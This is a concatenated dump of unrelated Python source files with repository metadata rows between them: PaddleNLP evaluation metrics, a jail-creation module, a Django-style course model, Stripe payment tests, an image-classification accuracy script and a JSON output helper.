def __init__(self, name='mcc', *args, **kwargs):
super(Mcc, self).__init__(*args, **kwargs)
self._name = name
self.tp = 0 # true positive
self.fp = 0 # false positive
self.tn = 0 # true negative
self.fn = 0 # false negative
def compute(self, pred, label, *args):
"""
Processes the pred tensor, and returns the indices of the maximum of each
sample.
Args:
pred (Tensor):
The predicted value is a Tensor with dtype float32 or float64.
Shape is [batch_size, 1].
label (Tensor):
The ground truth value is Tensor with dtype int64, and its
shape is [batch_size, 1].
Returns:
tuple: A tuple of preds and label. Each shape is
[batch_size, 1], with dtype float32 or float64.
"""
preds = paddle.argsort(pred, descending=True)[:, :1]
return (preds, label)
def update(self, preds_and_labels):
"""
Calculates states, i.e. the number of true positive, false positive,
true negative and false negative samples.
Args:
preds_and_labels (tuple[Tensor]):
Tuple of predicted value and the ground truth label, with dtype
float32 or float64. Each shape is [batch_size, 1].
"""
preds = preds_and_labels[0]
labels = preds_and_labels[1]
if isinstance(preds, paddle.Tensor):
preds = preds.numpy()
if isinstance(labels, paddle.Tensor):
labels = labels.numpy().reshape(-1, 1)
sample_num = labels.shape[0]
for i in range(sample_num):
pred = preds[i]
label = labels[i]
if pred == 1:
if pred == label:
self.tp += 1
else:
self.fp += 1
else:
if pred == label:
self.tn += 1
else:
self.fn += 1
def accumulate(self):
"""
Calculates and returns the accumulated metric.
Returns:
tuple: Returns the accumulated metric, a tuple of shape (mcc,), `mcc` is the accumulated mcc and its data
type is float64.
"""
if self.tp == 0 or self.fp == 0 or self.tn == 0 or self.fn == 0:
mcc = 0.0
else:
            # mcc = (tp*tn - fp*fn) / sqrt((tp+fp)*(tp+fn)*(tn+fp)*(tn+fn))
mcc = (self.tp * self.tn - self.fp * self.fn) / math.sqrt(
(self.tp + self.fp) * (self.tp + self.fn) *
(self.tn + self.fp) * (self.tn + self.fn))
return (mcc, )
def reset(self):
"""
Resets all metric states.
"""
self.tp = 0 # true positive
self.fp = 0 # false positive
self.tn = 0 # true negative
self.fn = 0 # false negative
def name(self):
"""
Returns name of the metric instance.
Returns:
str: The name of the metric instance.
"""
return self._name
class PearsonAndSpearman(Metric):
"""
The class calculates `Pearson correlation coefficient <https://en.wikipedia.org/wiki/Pearson_correlation_coefficient>`_
and `Spearman's rank correlation coefficient <https://en.wikipedia.org/wiki/Spearman%27s_rank_correlation_coefficient>`_ .
Args:
name (str, optional):
String name of the metric instance. Defaults to 'pearson_and_spearman'.
Example:
.. code-block::
import paddle
from paddlenlp.metrics import PearsonAndSpearman
x = paddle.to_tensor([[0.1], [1.0], [2.4], [0.9]])
y = paddle.to_tensor([[0.0], [1.0], [2.9], [1.0]])
m = PearsonAndSpearman()
m.update((x, y))
res = m.accumulate()
print(res) # (0.9985229081857804, 1.0, 0.9992614540928901)
"""
def __init__(self, name='pearson_and_spearman', *args, **kwargs):
super(PearsonAndSpearman, self).__init__(*args, **kwargs)
self._name = name
self.preds = []
self.labels = []
def update(self, preds_and_labels):
"""
Ensures the type of preds and labels is numpy.ndarray and reshapes them
into [-1, 1].
Args:
preds_and_labels (tuple[Tensor] or list[Tensor]):
Tuple or list of predicted value and the ground truth label.
Its data type should be float32 or float64 and its shape is [batch_size, d0, ..., dN].
"""
preds = preds_and_labels[0]
labels = preds_and_labels[1]
if isinstance(preds, paddle.Tensor):
preds = preds.numpy()
if isinstance(labels, paddle.Tensor):
labels = labels.numpy()
preds = np.squeeze(preds.reshape(-1, 1)).tolist()
labels = np.squeeze(labels.reshape(-1, 1)).tolist()
self.preds.append(preds)
self.labels.append(labels)
def accumulate(self):
"""
Calculates and returns the accumulated metric.
Returns:
tuple: Returns the accumulated metric, a tuple of (pearson, spearman,
the_average_of_pearson_and_spearman).
With the fields:
- `pearson` (numpy.float64):
The accumulated pearson.
- `spearman` (numpy.float64):
The accumulated spearman.
- `the_average_of_pearson_and_spearman` (numpy.float64):
The average of accumulated pearson and spearman correlation
coefficient.
"""
preds = [item for sublist in self.preds for item in sublist]
labels = [item for sublist in self.labels for item in sublist]
pearson = self.pearson(preds, labels)
spearman = self.spearman(preds, labels)
return (
pearson,
spearman,
(pearson + spearman) / 2,
)
def pearson(self, preds, labels):
n = len(preds)
# simple sums
sum1 = sum(float(preds[i]) for i in range(n))
sum2 = sum(float(labels[i]) for i in range(n))
# sum up the squares
sum1_pow = sum([pow(v, 2.0) for v in preds])
sum2_pow = sum([pow(v, 2.0) for v in labels])
# sum up the products
p_sum = sum([preds[i] * labels[i] for i in range(n)])
numerator = p_sum - (sum1 * sum2 / n)
denominator = math.sqrt(
(sum1_pow - pow(sum1, 2) / n) * (sum2_pow - pow(sum2, 2) / n))
if denominator == 0:
return 0.0
return numerator / denominator
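    # Note: the expression above is the textbook Pearson formula
    # r = (sum(xy) - sum(x)*sum(y)/n) / sqrt((sum(x^2) - sum(x)^2/n) * (sum(y^2) - sum(y)^2/n)).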
def spearman(self, preds, labels):
preds_rank = self.get_rank(preds)
labels_rank = self.get_rank(labels)
total = 0
n = len(preds)
for i in range(n):
total += pow((preds_rank[i] - labels_rank[i]), 2)
spearman = 1 - float(6 * total) / (n * (pow(n, 2) - 1))
return spearman
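    # Note: this is the rank-based closed form rho = 1 - 6 * sum(d_i^2) / (n * (n^2 - 1)),
    # where d_i is the rank difference of sample i between preds and labels.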
def get_rank(self, raw_list):
x = np.array(raw_list)
r_x = np.empty(x.shape, dtype=int)
y = np.argsort(-x)
for i, k in enumerate(y):
r_x[k] = i + 1
return r_x
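    # Illustrative check: get_rank([0.1, 1.0, 2.4, 0.9]) returns [4, 2, 1, 3],
    # since rank 1 is assigned to the largest value and counts upwards.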
def reset(self):
"""
Resets all metric states.
"""
self.preds = []
self.labels = []
def name(self):
"""
Returns name of the metric instance.
Returns:
str: The name of the metric instance.
"""
return self._name
class MultiLabelsMetric(Metric):
"""
This class encapsulates Accuracy, Precision, Recall and F1 metric logic in
multi-labels setting (also the binary setting).
    Some code is taken and modified from sklearn.metrics.
Args:
num_labels (int)
The total number of labels which is usually the number of classes
name (str, optional):
String name of the metric instance. Defaults to 'multi_labels_metric'.
Example:
.. code-block::
import paddle
from paddlenlp.metrics import MultiLabelsMetric
x = paddle.to_tensor([[0.1, 0.2, 0.9], [0.5, 0.8, 0.5], [0.6, 1.5, 0.4], [2.8, 0.7, 0.3]])
y = paddle.to_tensor([[2], [1], [2], [1]])
m = MultiLabelsMetric(num_labels=3)
args = m.compute(x, y)
m.update(args)
result1 = m.accumulate(average=None)
# (array([0.0, 0.5, 1.0]), array([0.0, 0.5, 0.5]), array([0.0, 0.5, 0.66666667]))
result2 = m.accumulate(average='binary', pos_label=0)
# (0.0, 0.0, 0.0)
result3 = m.accumulate(average='binary', pos_label=1)
# (0.5, 0.5, 0.5)
result4 = m.accumulate(average='binary', pos_label=2)
# (1.0, 0.5, 0.6666666666666666)
result5 = m.accumulate(average='micro')
# (0.5, 0.5, 0.5)
result6 = m.accumulate(average='macro')
# (0.5, 0.3333333333333333, 0.38888888888888884)
result7 = m.accumulate(average='weighted')
# (0.75, 0.5, 0.5833333333333333)
    Note: When zero_division is encountered (details below), the corresponding metrics will be set to 0.0
precision is zero_division if there are no positive predictions
recall is zero_division if there are no positive labels
fscore is zero_division if all labels AND predictions are negative
"""
def __init__(self, num_labels, name='multi_labels_metric'):
super(MultiLabelsMetric, self).__init__()
if num_labels <= 1:
raise ValueError(
f"The num_labels is {num_labels}, which must be greater than 1."
)
self.num_labels = num_labels
self._name = name
self._confusion_matrix = np.zeros((num_labels, 2, 2), dtype=int)
def update(self, args):
"""
Updates the metrics states (accuracy, precision and recall), in order to
calculate accumulated accuracy, precision and recall of all instances.
Args:
args (tuple of Tensor):
the tuple returned from `compute` function
"""
pred = args[0].numpy()
label = args[1].numpy()
tmp_confusion_matrix = self._multi_labels_confusion_matrix(pred, label)
self._confusion_matrix += tmp_confusion_matrix
def accumulate(self, average=None, pos_label=1):
"""
Calculates and returns the accumulated metric.
Args:
            average (str in {'binary', 'micro', 'macro', 'weighted'} or None, optional):
Defaults to `None`. If `None`, the scores for each class are returned.
Otherwise, this determines the type of averaging performed on the data:
- `binary` :
Only report results for the class specified by pos_label.
- `micro` :
Calculate metrics globally by counting the total true positives,
false negatives and false positives.
- `macro` :
Calculate metrics for each label, and find their unweighted mean.
This does not take label imbalance into account.
- `weighted` :
Calculate metrics for each label, and find their average weighted
by support (the number of true instances for each label). This
alters `macro` to account for label imbalance; it can result in
an F-score that is not between precision and recall.
pos_label (int, optional):
The positive label for calculating precision and recall in binary settings.
                Note: this argument is used only when `average='binary'`. Otherwise,
it will be ignored.
Defaults to 1.
Returns:
tuple: The accumulated metric. A tuple of shape (precision, recall, f1)
With the fields:
- `precision` (numpy.float64 or numpy.ndarray if average=None):
The accumulated precision.
- `recall` (numpy.float64 or numpy.ndarray if average=None):
The accumulated recall.
- `f1` (numpy.float64 or numpy.ndarray if average=None):
The accumulated f1.
"""
if average not in {'binary', 'micro', 'macro', 'weighted', None}:
raise ValueError(f"The average is {average}, which is unknown.")
if average == 'binary':
if pos_label >= self.num_labels:
raise ValueError(
f"The pos_label is {pos_label}, num_labels is {self.num_labels}. "
f"The num_labels must be greater than pos_label.")
confusion_matrix = None # [*, 2, 2]
if average == 'binary':
confusion_matrix = np.expand_dims(self._confusion_matrix[pos_label],
axis=0)
elif average == 'micro':
confusion_matrix = self._confusion_matrix.sum(axis=0, keepdims=True)
# if average is 'macro' or 'weighted' or None
else:
confusion_matrix = self._confusion_matrix
tp = confusion_matrix[:, 1, 1] # [*,]
pred = tp + confusion_matrix[:, 0, 1] # [*,]
true = tp + confusion_matrix[:, 1, 0] # [*,]
def _robust_divide(numerator, denominator, metric_name):
mask = denominator == 0.0
denominator = denominator.copy()
denominator[mask] = 1 # avoid zero division
result = numerator / denominator
if not np.any(mask):
return result
# precision is zero_division if there are no positive predictions
# recall is zero_division if there are no positive labels
# fscore is zero_division if all labels AND predictions are negative
warnings.warn(f'Zero division when calculating {metric_name}.',
UserWarning)
result[mask] = 0.0
return result
precision = _robust_divide(tp, pred, 'precision')
recall = _robust_divide(tp, true, 'recall')
f1 = _robust_divide(2 * (precision * recall), (precision + recall),
'f1')
weights = None # [num_labels]
if average == 'weighted':
weights = true
if weights.sum() == 0:
zero_division_value = np.float64(0.0)
if pred.sum() == 0:
return (zero_division_value, zero_division_value,
zero_division_value)
else:
return (np.float64(0.0), zero_division_value,
np.float64(0.0))
elif average == 'macro':
weights = np.ones((self.num_labels), dtype=float)
if average is not None:
precision = np.average(precision, weights=weights)
recall = np.average(recall, weights=weights)
f1 = np.average(f1, weights=weights)
return precision, recall, f1
def compute(self, pred, label):
"""
Accepts network's output and the labels, and calculates the top-k
(maximum value in topk) indices for accuracy.
Args:
pred (Tensor):
Predicted tensor, and its dtype is float32 or float64, and
has a shape of [batch_size, *, num_labels].
label (Tensor):
                The ground truth tensor, and its dtype is int64, and has a
shape of [batch_size, *] or [batch_size, *, num_labels] in one
hot representation.
Returns:
            tuple of Tensor: it contains two Tensors of shape [*, 1].
The tuple should be passed to `update` function.
"""
if not (paddle.is_tensor(pred) and paddle.is_tensor(label)):
raise ValueError('pred and label must be paddle tensor')
if pred.shape[-1] != self.num_labels:
raise ValueError(f'The last dim of pred is {pred.shape[-1]}, '
f'which should be num_labels')
pred = paddle.reshape(pred, [-1, self.num_labels])
pred = paddle.argmax(pred, axis=-1)
if label.shape[-1] == self.num_labels:
label = paddle.reshape(label, [-1, self.num_labels])
label = paddle.argmax(label, axis=-1)
else:
label = paddle.reshape(label, [-1])
if paddle.max(label) >= self.num_labels:
raise ValueError(f"Tensor label has value {paddle.max(label)}, "
f"which is no less than num_labels")
if pred.shape[0] != label.shape[0]:
raise ValueError(
f"The length of pred is not equal to the length of label")
return pred, label
def _multi_labels_confusion_matrix(self, pred, label):
tp_bins = label[pred == label]
tp = np.bincount(tp_bins, minlength=self.num_labels) # [num_labels,]
tp_plus_fp = np.bincount(pred,
minlength=self.num_labels) # [num_labels,]
tp_plus_fn = np.bincount(label,
minlength=self.num_labels) # [num_labels,]
fp = tp_plus_fp - tp # [num_labels,]
fn = tp_plus_fn - tp # [num_labels,]
tn = pred.shape[0] - tp - fp - fn # [num_labels,]
return np.array([tn, fp, fn, tp]).T.reshape(-1, 2,
2) # [num_labels, 2, 2]
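    # Layout per label: [[tn, fp], [fn, tp]], so accumulate() reads tp from
    # [:, 1, 1], fp from [:, 0, 1] and fn from [:, 1, 0].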
def reset(self):
self._confusion_matrix = np.zeros((self.num_labels, 2, 2), dtype=int)
def name(self):
"""
Returns name of the metric instance.
Returns:
str: The name of the metric instance.
"""
return self._name
| 35.266667 | 128 | 0.557533 |
518acc85a3eafe90e437ee149571f3c558eaa570
| 640 |
py
|
Python
|
jocker/create.py
|
omab/jocker
|
44a79d4c12bb4df9c3333da75eb34964de64ad20
|
[
"BSD-2-Clause"
] | 3 |
2017-10-18T08:11:58.000Z
|
2019-07-31T23:53:37.000Z
|
jocker/create.py
|
omab/jocker
|
44a79d4c12bb4df9c3333da75eb34964de64ad20
|
[
"BSD-2-Clause"
] | null | null | null |
jocker/create.py
|
omab/jocker
|
44a79d4c12bb4df9c3333da75eb34964de64ad20
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Create a jail from the given base
"""
from .parser import parse, Jockerfile
from .backends.utils import get_backend
def create_from_base(base, name=None, network=None):
"""
Build a Jail from the given base.
"""
jail_backend = get_backend(jailname=name)
jockerfile = jail_backend.base_jockerfile(base)
jail_backend.create(jockerfile, network=network)
def create_from_jockerfile(jockerfile, name=None, network=None):
"""
    Build a Jail from the given Jockerfile.
"""
jockerfile = Jockerfile(jockerfile)
jail_backend = get_backend(jailname=name)
jail_backend.create(jockerfile, network=network)
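# A minimal usage sketch (jail and base names here are assumed, not taken
# from this module):
# create_from_base('12.2-RELEASE', name='web1', network='jocker0')
# create_from_jockerfile('./Jockerfile', name='web2')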
| 26.666667 | 64 | 0.726563 |
5c79d353daa1f8a4feb8ecfea670be116ee20ee4
| 1,666 |
py
|
Python
|
src/onegov/fsi/models/course.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/fsi/models/course.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/fsi/models/course.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from arrow import utcnow
from onegov.core.html import html_to_text
from onegov.core.orm import Base
from onegov.core.orm.types import UUID
from onegov.search import ORMSearchable
from sqlalchemy import Column, Text, Boolean, Integer
from sqlalchemy.ext.hybrid import hybrid_property
from uuid import uuid4
class Course(Base, ORMSearchable):
__tablename__ = 'fsi_courses'
es_properties = {
'name': {'type': 'localized'},
'description': {'type': 'localized'},
}
es_public = True
id = Column(UUID, primary_key=True, default=uuid4)
name = Column(Text, nullable=False, unique=True)
description = Column(Text, nullable=False)
# saved as integer (years), accessed as years
refresh_interval = Column(Integer)
# If the course has to be refreshed after some interval
mandatory_refresh = Column(Boolean, nullable=False, default=False)
# hides the course in the collection for non-admins
hidden_from_public = Column(Boolean, nullable=False, default=False)
@property
def title(self):
return self.name
@property
def lead(self):
text = html_to_text(self.description)
if len(text) > 160:
return text[:160] + '…'
else:
return text
@property
def description_html(self):
"""
Returns the description that is saved as HTML from the redactor js
plugin.
"""
return self.description
@hybrid_property
def future_events(self):
from onegov.fsi.models import CourseEvent
return self.events.filter(CourseEvent.start > utcnow()).order_by(
CourseEvent.start)
| 27.311475 | 74 | 0.672869 |
56b4c87928c8ebc3b548ac95e2fa6293330a2830
| 245 |
py
|
Python
|
server/api/__init__.py
|
gustavodsf/rdx_hack
|
3b504bf8181495fdd1c3a06f963970469f6655f1
|
[
"MIT"
] | null | null | null |
server/api/__init__.py
|
gustavodsf/rdx_hack
|
3b504bf8181495fdd1c3a06f963970469f6655f1
|
[
"MIT"
] | null | null | null |
server/api/__init__.py
|
gustavodsf/rdx_hack
|
3b504bf8181495fdd1c3a06f963970469f6655f1
|
[
"MIT"
] | 1 |
2017-12-02T15:27:53.000Z
|
2017-12-02T15:27:53.000Z
|
"""This py describe the class the could be accessed by other."""
__author__ = "Gustavo Figueiredo"
__copyright__ = "CASA"
__version__ = "1.0.1"
__maintainer__ = "Gustavo Figueiredo"
__email__ = "[email protected]"
__status__ = "Development"
| 30.625 | 64 | 0.755102 |
8531c3f882fd85200eb06cfa874e12b0eb85ad5e
| 152 |
py
|
Python
|
tintz/newsletter/urls.py
|
dcfranca/tintz-backend
|
9f29e17cafc31ab7dc568d1e2c984e6f1b1fc3fc
|
[
"MIT"
] | null | null | null |
tintz/newsletter/urls.py
|
dcfranca/tintz-backend
|
9f29e17cafc31ab7dc568d1e2c984e6f1b1fc3fc
|
[
"MIT"
] | 2 |
2021-03-19T21:51:51.000Z
|
2021-06-10T18:22:50.000Z
|
tintz/newsletter/urls.py
|
danielfranca/tintz-backend
|
9f29e17cafc31ab7dc568d1e2c984e6f1b1fc3fc
|
[
"MIT"
] | null | null | null |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^subscribers/$', views.SubscriberApi.as_view(), name='subscribers'),
]
| 19 | 78 | 0.710526 |
a47bed0d65469e8cadf2cbd5286af7688bd5866a
| 4,089 |
py
|
Python
|
tests/onegov/pay/test_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/pay/test_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/pay/test_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import logging
import pytest
import requests_mock
import transaction
from onegov.pay.models.payment_providers.stripe import (
StripeConnect,
StripeFeePolicy,
StripeCaptureManager
)
from purl import URL
from unittest import mock
from urllib.parse import quote
def test_oauth_url():
provider = StripeConnect(client_id='foo', client_secret='bar')
url = provider.oauth_url('https://handle-incoming-request')
assert 'response_type=code' in url
assert 'handle-incoming-request' in url
assert 'scope=read_write' in url
assert 'client_id=foo' in url
assert 'client_secret=bar' in url
url = provider.oauth_url('https://foo', 'bar', {'email': '[email protected]'})
assert 'state=bar' in url
assert 'stripe_user%5Bemail%5D=foo%40bar.org' in url
def test_process_oauth_response():
provider = StripeConnect(
client_id='foo',
client_secret='bar',
oauth_gateway='https://oauth.onegovcloud.ch/',
oauth_gateway_secret='foo',
)
with pytest.raises(RuntimeError) as e:
provider.process_oauth_response(
{
'error': 'foo',
'error_description': 'bar',
}
)
assert e.value.args == ('Stripe OAuth request failed (foo: bar)', )
with mock.patch('stripe.OAuth.token', return_value={
'scope': 'read_write',
'stripe_publishable_key': 'pubkey',
'stripe_user_id': 'uid',
'refresh_token': 'rtoken',
'access_token': 'atoken',
}):
provider.process_oauth_response({
'code': '0xdeadbeef',
'oauth_redirect_secret': 'foo'
})
assert provider.publishable_key == 'pubkey'
assert provider.user_id == 'uid'
assert provider.refresh_token == 'rtoken'
assert provider.access_token == 'atoken'
def test_stripe_fee_policy():
assert StripeFeePolicy.from_amount(100) == 3.2
assert StripeFeePolicy.compensate(100) == 103.3
assert StripeFeePolicy.compensate(33.33) == 34.63
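    # These values are consistent with a fee assumption of 2.9% + 0.30 per
    # charge (not stated in this file):
    #   from_amount(100) = 100 * 0.029 + 0.30 = 3.20
    #   compensate(100) = (100 + 0.30) / (1 - 0.029) ~= 103.30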
def test_stripe_capture_good_charge():
class GoodCharge(object):
captured = False
def capture(self):
self.captured = True
charge = GoodCharge()
with mock.patch('stripe.Charge.retrieve', return_value=charge):
StripeCaptureManager.capture_charge('foo', 'bar')
assert not charge.captured
transaction.commit()
assert charge.captured
def test_stripe_capture_evil_charge(capturelog):
capturelog.setLevel(logging.ERROR, logger='onegov.pay')
class EvilCharge(object):
def capture(self):
assert False
charge = EvilCharge()
with mock.patch('stripe.Charge.retrieve', return_value=charge):
StripeCaptureManager.capture_charge('foo', 'bar')
transaction.commit()
assert capturelog.records()[0].message\
== 'Stripe charge with capture id bar failed'
def test_stripe_capture_negative_vote():
with mock.patch('stripe.Charge.retrieve', side_effect=AssertionError()):
StripeCaptureManager.capture_charge('foo', 'bar')
with pytest.raises(AssertionError):
transaction.commit()
def test_stripe_prepare_oauth_request():
stripe = StripeConnect()
stripe.oauth_gateway = 'https://oauth.example.org'
stripe.oauth_gateway_auth = 'gateway_auth'
stripe.oauth_gateway_secret = 'gateway_secret'
stripe.client_id = 'client_id'
stripe.client_secret = 'client_secret'
with requests_mock.Mocker() as m:
m.post('https://oauth.example.org/register/gateway_auth', json={
'token': '0xdeadbeef'
})
url = stripe.prepare_oauth_request(
redirect_uri='https://endpoint',
success_url='https://success',
error_url='https://error'
)
assert quote('https://oauth.example.org/redirect', safe='') in url
url = URL(url)
assert url.query_param('state') == '0xdeadbeef'
assert url.query_param('scope') == 'read_write'
assert url.query_param('client_id') == 'client_id'
| 29.207143 | 76 | 0.651993 |
f1825865e92fdab20152b97a1e9e014916db2c8f
| 2,354 |
py
|
Python
|
CCR/run.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 3 |
2019-03-21T17:02:55.000Z
|
2019-04-04T18:16:10.000Z
|
CCR/run.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 11 |
2019-10-30T12:05:39.000Z
|
2022-03-11T23:43:54.000Z
|
CCR/run.py
|
MateRyze/InformatiCup-2019
|
eeca3ff7f8a102f4093697c6badee21ce25e2e87
|
[
"MIT"
] | 1 |
2019-10-30T12:04:00.000Z
|
2019-10-30T12:04:00.000Z
|
import requests
import os
import skimage.io
import skimage.transform
import time
import csv
from PIL import Image
import pandas as pd
# dir with test images
rootdir = './Images'
# resize images to 64x64 and convert from PPM to PNG format
def convertImages():
for subdir, dirs, files in os.walk(rootdir):
for file in files:
path = os.path.join(subdir, file)
print(path)
data = skimage.io.imread(path)
data = skimage.transform.resize(data, (64, 64))
skimage.io.imsave(path.replace('.ppm', '.png'), data)
def getClasses():
names = set([])
list = []
i = 0
limit = 100
for subdir, dirs, files in os.walk(rootdir):
for file in files:
if (i < limit):
path = os.path.join(subdir, file)
if '.png' in path:
print(path)
image = Image.open(path)
payload= {'key': 'Engeibei1uok4xaecahChug6eihos0wo'}
r = requests.post('https://phinau.de/trasi', data=payload, files= {'image': open(path, 'rb')})
# get all classes from the API
for name in r.json():
names.add(name.get('class'))
print(names, len(names))
time.sleep(1)
i = i + 1
'''
try:
names.add(r.json()[0].get('class'))
d = {"filename": path, "class": r.json()[0].get('class'), "confidence": r.json()[0].get('confidence')}
print(names, len(names))
list.append(d)
print(i, len(names))
time.sleep(1)
i = i + 1
except:
with open('results.csv', 'w') as f:
w = csv.DictWriter(f, list[0].keys(), delimiter =';')
for item in list:
w.writerow(item)
'''
def mapResults():
with open('results.csv', 'r') as f:
df = pd.read_csv(f)
print(df)
with open('results_mapping.csv', 'r') as idFile:
idFileDF = pd.read_csv(idFile)
print(idFileDF)
for index, row in idFileDF.iterrows():
name = row[0]
df.loc[df['class'] == name, ['actual_id']] = row[1]
df.to_csv('results_mapped.csv')
# calculate the Correct Classification Rate (CCR) from a CSV file
def calculateCCR():
cumulatedResult = 0
with open('results_mapped.csv', 'r') as f:
df = pd.read_csv(f)
print(df)
for index, row in df.iterrows():
if(row[5] == row[6]):
#print(row[5], row[6])
cumulatedResult += 1
print "CCR: ", float(cumulatedResult)/len(df.index)
#convertImages()
#getClasses()
#mapResults()
# FOR RESULTS SEE: results_mapped.csv
calculateCCR()
| 26.155556 | 108 | 0.616822 |
7ac3ea0d02e770dd38e788a27e196357f2564a77
| 344 |
py
|
Python
|
dcapy/dca/__init__.py
|
scuervo91/dcapy
|
46c9277e607baff437e5707167476d5f7e2cf80c
|
[
"MIT"
] | 4 |
2021-05-21T13:26:10.000Z
|
2021-11-15T17:17:01.000Z
|
dcapy/dca/__init__.py
|
scuervo91/dcapy
|
46c9277e607baff437e5707167476d5f7e2cf80c
|
[
"MIT"
] | null | null | null |
dcapy/dca/__init__.py
|
scuervo91/dcapy
|
46c9277e607baff437e5707167476d5f7e2cf80c
|
[
"MIT"
] | null | null | null |
from .arps import arps_exp_rate,arps_exp_cumulative,arps_arm_cumulative,arps_hyp_cumulative,arps_cumulative, arps_hyp_rate, arps_rate_time, arps_forecast,Arps
from .dca import DCA, Forecast, ProbVar
from .timeconverter import converter_factor, list_freq,time_converter_matrix, FreqEnum
from .wor import bsw_to_wor, wor_to_bsw, wor_forecast, Wor
| 86 | 158 | 0.869186 |
7ad41c2d042dc89d23676dca3bc129fe7f96d538
| 2,203 |
py
|
Python
|
src/processing/Output.py
|
Phrosten/CodeCompetition_07-2017_BigData
|
3d9cb8da2164ea2687471375966d77ff7b129a93
|
[
"Apache-2.0"
] | null | null | null |
src/processing/Output.py
|
Phrosten/CodeCompetition_07-2017_BigData
|
3d9cb8da2164ea2687471375966d77ff7b129a93
|
[
"Apache-2.0"
] | null | null | null |
src/processing/Output.py
|
Phrosten/CodeCompetition_07-2017_BigData
|
3d9cb8da2164ea2687471375966d77ff7b129a93
|
[
"Apache-2.0"
] | null | null | null |
#
# JSON Output
#
def GenerateJSONArray(list, startIndex=0, endIndex=None, date=False): # Generate a json array string from a list
# ASSUMPTION: All items are of the same type / if one is list all are list
if(len(list) > 0 and type(list[0]) == type([])): # If the list has entries and the type of the list items is list as well
acc = "[" # Accumulate the data
for i in range(0, len(list)): # Recursively add the json strings of each list to the accumulator
acc += GenerateJSONArray(list[i])
if(not i == len(list) - 1):
acc += ","
return acc + "]" # Return the accumulator
else: # If the list contains non list items
acc = "["
if(endIndex == None):
endIndex = len(list) # Set a default endIndex if None is provided
for i in range(startIndex, endIndex): # Iterate the list
value = "" # Get value as string
number = False # False if item is not a number
try: # Try to parse the string to a number
value = int(list[i])
number = True
except ValueError:
try:
value = round(float(list[i]), 2)
number = True
except ValueError:
value = list[i]
if(not number or date): # If the item is not a number add "
acc += "\"" + list[i].replace("\"", "\\\"") + "\""
else: # Else add it just as string
                if(isinstance(value, float) and value.is_integer()):
                    value = int(value) # Drop a trailing ".0" (e.g. 3.0 -> 3) without mangling values like 3.05
                acc += str(value)
if(not i == len(list) - 1):
acc += ","
return acc + "]"
def GenerateJSONArrayFromDict(dict, endIndex): # Generate json string from dictionary
# ASSUMPTION: Dict only has number keys
acc = "["
for i in range(0, endIndex): # Go through all possible keys starting from 0
if(not i in dict): # If the key is not in the dictionary
val = 0 # Its value is 0
else:
val = dict[i] # Else get value
acc += str(val) # Add value to accumulator
if(not i == endIndex - 1):
acc += ","
return acc + "]"
| 36.114754 | 130 | 0.532002 |
24c8d95c8cb878f0d1928158a43b83c03635fe7a
| 13,485 |
py
|
Python
|
python-bildungslogin/ucs-test/97_bildungslogin_python/10_test_search.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
python-bildungslogin/ucs-test/97_bildungslogin_python/10_test_search.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
python-bildungslogin/ucs-test/97_bildungslogin_python/10_test_search.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
#!/usr/share/ucs-test/runner /usr/bin/py.test -slvv --cov --cov-config=.coveragerc --cov-append --cov-report=
# -*- coding: utf-8 -*-
#
# Copyright 2021 Univention GmbH
#
# https://www.univention.de/
#
# All rights reserved.
#
# The source code of this program is made available
# under the terms of the GNU Affero General Public License version 3
# (GNU AGPL V3) as published by the Free Software Foundation.
#
# Binary versions of this program provided by Univention to you as
# well as other copyrighted, protected or trademarked materials like
# Logos, graphics, fonts, specific documentations and configurations,
# cryptographic keys etc. are subject to a license agreement between
# you and Univention and not subject to the GNU AGPL V3.
#
# In the case you use this program under the terms of the GNU AGPL V3,
# the program is provided in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License with the Debian GNU/Linux or Univention distribution in file
# /usr/share/common-licenses/AGPL-3; if not, see
# <https://www.gnu.org/licenses/>.
## desc: search for licenses
## exposure: dangerous
## tags: [bildungslogin]
## roles: [domaincontroller_master, domaincontroller_backup, domaincontroller_slave]
## packages: [python-bildungslogin, udm-bildungslogin-encoders]
from copy import deepcopy
from datetime import datetime, timedelta
from uuid import uuid4
import pytest
from ucsschool.lib.models.user import Student
from univention.bildungslogin.handlers import AssignmentHandler, LicenseHandler, MetaDataHandler, \
ObjectType
from univention.bildungslogin.models import LicenseType
from univention.udm import UDM
GOOD_SEARCH = "FOUND"
FUZZY_SEARCH = "*FUZZY*"
BAD_SEARCH = "NOT_FOUND"
@pytest.fixture(scope="module")
def test_user(lo_module, ou):
user = Student(
password="univention",
name="bildungslogin_username",
firstname="bildungslogin_firstname",
lastname="bildungslogin_lastname",
school=ou,
)
user.create(lo_module)
return user.name
@pytest.fixture(scope="module")
def single_license(
get_license,
get_meta_data,
lo_module,
ou,
test_user,
):
license_handler = LicenseHandler(lo_module)
meta_data_handler = MetaDataHandler(lo_module)
assignment_handler = AssignmentHandler(lo_module)
